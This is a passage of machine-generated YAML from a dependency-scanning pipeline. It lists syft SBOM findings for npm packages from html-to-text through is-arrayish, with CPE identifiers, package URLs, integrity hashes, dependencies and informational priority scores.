- cpe: cpe:2.3:a:html-to-text:html_to_text:9.0.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:html_to_text:html-to-text:9.0.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:html_to_text:html_to_text:9.0.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:html-to:html-to-text:9.0.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:html-to:html_to_text:9.0.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:html_to:html-to-text:9.0.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:html_to:html_to_text:9.0.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:html:html-to-text:9.0.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:html:html_to_text:9.0.5:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/html-to-text@9.0.5
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/html-to-text/-/html-to-text-9.0.5.tgz
integrity: sha512-qY60FjREgVZL03vJU6IfMV4GDjGBIoOyvuFdpBDIX9yTlDw0TjxVBQp+P8NvpdIXNJvfWBTNul7fsAQJq2FNpg==
dependencies:
'@selderee/plugin-htmlparser2': ^0.11.0
deepmerge: ^4.3.1
dom-serializer: ^2.0.0
htmlparser2: ^8.0.2
selderee: ^0.11.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: c43d43edb7287d6e
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: htmlparser2 8.0.2'
title: htmlparser2 8.0.2
description: 'Package discovered: htmlparser2 8.0.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 4a5b4c89e570771b
name: htmlparser2
version: 8.0.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:htmlparser2:htmlparser2:8.0.2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/htmlparser2@8.0.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/htmlparser2/-/htmlparser2-8.0.2.tgz
integrity: sha512-GYdjWKDkbRLkZ5geuHs5NY1puJ+PXwP7+fHPRz06Eirsb9ugf6d8kkXav6ADhcODhFFPMIXyxkxSuMf3D6NCFA==
dependencies:
domelementtype: ^2.3.0
domhandler: ^5.0.3
domutils: ^3.0.1
entities: ^4.4.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: f927a519c85962f3
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: http-errors 2.0.1'
title: http-errors 2.0.1
description: 'Package discovered: http-errors 2.0.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: bf2c5c4cccddf639
name: http-errors
version: 2.0.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:http-errors:http-errors:2.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:http-errors:http_errors:2.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:http_errors:http-errors:2.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:http_errors:http_errors:2.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:http:http-errors:2.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:http:http_errors:2.0.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/http-errors@2.0.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/http-errors/-/http-errors-2.0.1.tgz
integrity: sha512-4FbRdAX+bSdmo4AUFuS0WNiPz8NgFt+r8ThgNWmlrjQjt1Q7ZR9+zTlce2859x4KSXrwIsaeTqDoKQmtP8pLmQ==
dependencies:
depd: ~2.0.0
inherits: ~2.0.4
setprototypeof: ~1.2.0
statuses: ~2.0.2
toidentifier: ~1.0.1
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: af32118f21902d1f
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: http-parser-js 0.5.10'
title: http-parser-js 0.5.10
description: 'Package discovered: http-parser-js 0.5.10'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: b85e63dfe0c1efe8
name: http-parser-js
version: 0.5.10
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:http-parser-js:http-parser-js:0.5.10:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:http-parser-js:http_parser_js:0.5.10:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:http_parser_js:http-parser-js:0.5.10:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:http_parser_js:http_parser_js:0.5.10:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:http-parser:http-parser-js:0.5.10:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:http-parser:http_parser_js:0.5.10:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:http_parser:http-parser-js:0.5.10:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:http_parser:http_parser_js:0.5.10:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:http:http-parser-js:0.5.10:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:http:http_parser_js:0.5.10:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/http-parser-js@0.5.10
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/http-parser-js/-/http-parser-js-0.5.10.tgz
integrity: sha512-Pysuw9XpUq5dVc/2SMHpuTY01RFl8fttgcyunjL7eEMhGM3cI4eOmiCycJDVCo/7O7ClfQD3SaI6ftDzqOXYMA==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 2fd1314214cea39c
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: http-proxy-agent 5.0.0'
title: http-proxy-agent 5.0.0
description: 'Package discovered: http-proxy-agent 5.0.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 91bc09c317f85f97
name: http-proxy-agent
version: 5.0.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:http-proxy-agent:http-proxy-agent:5.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:http-proxy-agent:http_proxy_agent:5.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:http_proxy_agent:http-proxy-agent:5.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:http_proxy_agent:http_proxy_agent:5.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:http-proxy:http-proxy-agent:5.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:http-proxy:http_proxy_agent:5.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:http_proxy:http-proxy-agent:5.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:http_proxy:http_proxy_agent:5.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:http:http-proxy-agent:5.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:http:http_proxy_agent:5.0.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/http-proxy-agent@5.0.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/http-proxy-agent/-/http-proxy-agent-5.0.0.tgz
integrity: sha512-n2hY8YdoRE1i7r6M0w9DIw5GgZN0G25P8zLCRQ8rjXtTU3vsNFBI/vWK/UIeE6g5MUUz6avwAPXmL6Fy9D/90w==
dependencies:
'@tootallnate/once': '2'
agent-base: '6'
debug: '4'
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: d375a13b9232535f
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: https-proxy-agent 5.0.1'
title: https-proxy-agent 5.0.1
description: 'Package discovered: https-proxy-agent 5.0.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: ac843d04db23cee1
name: https-proxy-agent
version: 5.0.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:https-proxy-agent_project:https-proxy-agent:5.0.1:*:*:*:*:node.js:*:*
source: nvd-cpe-dictionary
purl: pkg:npm/https-proxy-agent@5.0.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/https-proxy-agent/-/https-proxy-agent-5.0.1.tgz
integrity: sha512-dFcAjpTQFgoLMzC2VwU+C/CbS7uRL0lWmxDITmqm7C+7F0Odmj6s9l6alZc6AELXhrnggM2CeWSXHGOdX2YtwA==
dependencies:
agent-base: '6'
debug: '4'
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 56bdc5dcaf0f0066
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: https-proxy-agent 7.0.6'
title: https-proxy-agent 7.0.6
description: 'Package discovered: https-proxy-agent 7.0.6'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 2d10e944bb8687bf
name: https-proxy-agent
version: 7.0.6
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:https-proxy-agent_project:https-proxy-agent:7.0.6:*:*:*:*:node.js:*:*
source: nvd-cpe-dictionary
purl: pkg:npm/https-proxy-agent@7.0.6
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/https-proxy-agent/-/https-proxy-agent-7.0.6.tgz
integrity: sha512-vK9P5/iUfdl95AI+JVyUuIcVtd4ofvtrOr3HNtM2yxC9bnMbEdp3x01OhQNnjb8IJYi38VlTE3mBXwcfvywuSw==
dependencies:
agent-base: ^7.1.2
debug: '4'
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: eedb1c984540056e
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: hyphen 1.14.1'
title: hyphen 1.14.1
description: 'Package discovered: hyphen 1.14.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 0cfa30ecdd760351
name: hyphen
version: 1.14.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: ISC
spdxExpression: ISC
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:hyphen:hyphen:1.14.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/hyphen@1.14.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/hyphen/-/hyphen-1.14.1.tgz
integrity: sha512-kvL8xYl5QMTh+LwohVN72ciOxC0OEV79IPdJSTwEXok9y9QHebXGdFgrED4sWfiax/ODx++CAMk3hMy4XPJPOw==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 233f854a4d966408
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: iconv-lite 0.4.24'
title: iconv-lite 0.4.24
description: 'Package discovered: iconv-lite 0.4.24'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 3ce09826a837d25b
name: iconv-lite
version: 0.4.24
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:iconv-lite:iconv-lite:0.4.24:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:iconv-lite:iconv_lite:0.4.24:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:iconv_lite:iconv-lite:0.4.24:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:iconv_lite:iconv_lite:0.4.24:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:iconv:iconv-lite:0.4.24:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:iconv:iconv_lite:0.4.24:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/iconv-lite@0.4.24
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/iconv-lite/-/iconv-lite-0.4.24.tgz
integrity: sha512-v3MXnZAcvnywkTUEZomIActle7RXXeedOR31wwl7VlyoXO4Qi9arvSenNQWne1TcRwhCL1HwLI21bEqdpj8/rA==
dependencies:
safer-buffer: '>= 2.1.2 < 3'
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: a2d6f15d605131f9
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: inherits 2.0.4'
title: inherits 2.0.4
description: 'Package discovered: inherits 2.0.4'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 911374ff7f37ba7f
name: inherits
version: 2.0.4
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: ISC
spdxExpression: ISC
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:inherits:inherits:2.0.4:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/inherits@2.0.4
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz
integrity: sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 6970e7e10ca27673
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: ini 1.3.8'
title: ini 1.3.8
description: 'Package discovered: ini 1.3.8'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 29aeb86d59c0f085
name: ini
version: 1.3.8
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: ISC
spdxExpression: ISC
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:ini_project:ini:1.3.8:*:*:*:*:node.js:*:*
source: nvd-cpe-dictionary
purl: pkg:npm/ini@1.3.8
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/ini/-/ini-1.3.8.tgz
integrity: sha512-JV/yugV2uzW5iMRSiZAyDtQd+nxtUnjeLt0acNdw98kKLrvuRVyB80tsREOE7yvGVgalhZ6RNXCmEHkUKBKxew==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 9c64ace1b439e4fe
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: internmap 2.0.3'
title: internmap 2.0.3
description: 'Package discovered: internmap 2.0.3'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: da7b570ddddf2064
name: internmap
version: 2.0.3
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: ISC
spdxExpression: ISC
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:internmap:internmap:2.0.3:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/internmap@2.0.3
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/internmap/-/internmap-2.0.3.tgz
integrity: sha512-5Hh7Y1wQbvY5ooGgPbDaL5iYLAPzMTUrjMulskHLH6wnv/A+1q5rgEaiuqEjB+oxGXIVZs1FF+R/KPN3ZSQYYg==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: f4c9c2133d427419
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: ioredis 5.10.1'
title: ioredis 5.10.1
description: 'Package discovered: ioredis 5.10.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 0c5e141c3ee662a0
name: ioredis
version: 5.10.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:ioredis:ioredis:5.10.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/ioredis@5.10.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/ioredis/-/ioredis-5.10.1.tgz
integrity: sha512-HuEDBTI70aYdx1v6U97SbNx9F1+svQKBDo30o0b9fw055LMepzpOOd0Ccg9Q6tbqmBSJaMuY0fB7yw9/vjBYCA==
dependencies:
'@ioredis/commands': 1.5.1
cluster-key-slot: ^1.1.0
debug: ^4.3.4
denque: ^2.1.0
lodash.defaults: ^4.2.0
lodash.isarguments: ^3.1.0
redis-errors: ^1.2.0
redis-parser: ^3.0.0
standard-as-callback: ^2.1.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: af1cc3d21ce4d415
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: ip-address 10.2.0'
title: ip-address 10.2.0
description: 'Package discovered: ip-address 10.2.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 25abf70855373b85
name: ip-address
version: 10.2.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:ip-address:ip-address:10.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:ip-address:ip_address:10.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:ip_address:ip-address:10.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:ip_address:ip_address:10.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:ip:ip-address:10.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:ip:ip_address:10.2.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/ip-address@10.2.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/ip-address/-/ip-address-10.2.0.tgz
integrity: sha512-/+S6j4E9AHvW9SWMSEY9Xfy66O5PWvVEJ08O0y5JGyEKQpojb0K0GKpz/v5HJ/G0vi3D2sjGK78119oXZeE0qA==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 5ea31e6ac67f4d75
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: ipaddr.js 1.9.1'
title: ipaddr.js 1.9.1
description: 'Package discovered: ipaddr.js 1.9.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: c7a7f0ed243b0857
name: ipaddr.js
version: 1.9.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:ipaddr.js:ipaddr.js:1.9.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/ipaddr.js@1.9.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/ipaddr.js/-/ipaddr.js-1.9.1.tgz
integrity: sha512-0KI/607xoxSToH7GjN1FfSbLoU0+btTicjsQSWQlh/hZykN8KpmMf7uYwPW3R+akZ6R/w18ZlXSHBYXiYUPO3g==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: fae14e02f5662aa3
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: is-arrayish 0.3.4'
title: is-arrayish 0.3.4
description: 'Package discovered: is-arrayish 0.3.4'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 88ac3450fc3712b8
name: is-arrayish
version: 0.3.4
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:is-arrayish:is-arrayish:0.3.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:is-arrayish:is_arrayish:0.3.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:is_arrayish:is-arrayish:0.3.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:is_arrayish:is_arrayish:0.3.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:is:is-arrayish:0.3.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:is:is_arrayish:0.3.4:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/is-arrayish@0.3.4
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/is-arrayish/-/is-arrayish-0.3.4.tgz
integrity: sha512-m6UrgzFVUYawGBh1dUsWR5M2Clqic9RVXC/9f8ceNlv2IcO9j9J/z8UoCLPqtsPBFNzEpfR3xftohbfqDx8EQA==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: f590fee2d4fea15c
ruleId: SBOM.PACKAGE
severity: INFO
